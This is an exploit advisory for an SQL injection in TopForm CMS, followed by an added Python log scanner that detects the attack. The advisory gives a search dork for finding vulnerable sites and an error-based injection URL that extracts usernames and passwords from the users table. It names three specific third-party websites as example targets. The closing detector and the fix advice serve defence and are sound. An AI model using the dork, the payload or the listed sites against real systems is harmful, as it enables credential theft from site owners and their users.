TopForm CMS SQL Injection Vulnerability



EKU-ID: 1496 CVE: OSVDB-ID:
Author: faza02 Published: 2012-02-20 Verified: Verified


Title: TopForm CMS

	 Date:       17.01.2012
	 Author:     faza02
	 Vuln. type: SQL Injection
	 Dork:       inurl:"index.php?issue_id="
	 Vendor:     adminv.ru


Exploit: http://[site]/?issue_id=7&cat=2'+and+(select+1+from(select+count(*),concat((select+concat(login,0x3a,password)+from+users+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)+--+

Example: http://bzhi.ru/?issue_id=7&cat=2'
	 http://www.mandrogi.ru/?issue_id=85'
	 http://lensvet.com/index.php?issue_id=25'
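
Added example (not part of the original advisory or the vendor's code): a log check for the pattern shown above, flagging requests where issue_id or cat is not a plain integer or carries the error-based markers visible in the advisory's query string. The function names, the combined access-log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory shows being injected; legitimate values are integers.
NUMERIC_PARAMS = {"issue_id", "cat"}

# Markers of the error-based technique visible in the advisory's query string.
SIGNATURES = [
    ("information_schema", re.compile(r"information_schema", re.I)),
    ("floor(rand())", re.compile(r"floor\s*\(\s*rand\s*\(", re.I)),
    ("subselect", re.compile(r"\(\s*select\b", re.I)),
    ("sql-comment", re.compile(r"--\s|/\*")),
]

# Assumed log format: Apache/nginx "combined"; only the request line is used.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def inspect_request(target):
    """Return findings for one request target (path plus query string)."""
    findings = []
    # parse_qsl URL-decodes values, so '+' and %xx encodings are normalised.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name.lower() not in NUMERIC_PARAMS:
            continue
        if not re.fullmatch(r"[0-9]{1,10}", value):
            findings.append(f"{name}: non-numeric value")
        findings += [f"{name}: {label}" for label, rx in SIGNATURES if rx.search(value)]
    return findings

def scan_log(lines):
    """Return [(line_number, findings)] for log lines with suspicious parameters."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        findings = inspect_request(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Feb/2012:10:00:00 +0000] "GET /?issue_id=7&cat=2 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [20/Feb/2012:10:00:04 +0000] "GET /index.php?issue_id=25\' HTTP/1.1" 500 310',
    '203.0.113.9 - - [20/Feb/2012:10:00:09 +0000] "GET /?issue_id=7&cat=2\'+and+(select+1+from'
    '(select+count(*),floor(rand(0)*2)a+from+information_schema.tables+group+by+a)b)+--+ HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(findings)}")
```

Detection does not remove the flaw: on the application side, issue_id and cat should be cast to integers or bound as parameters in a prepared statement before they reach the query.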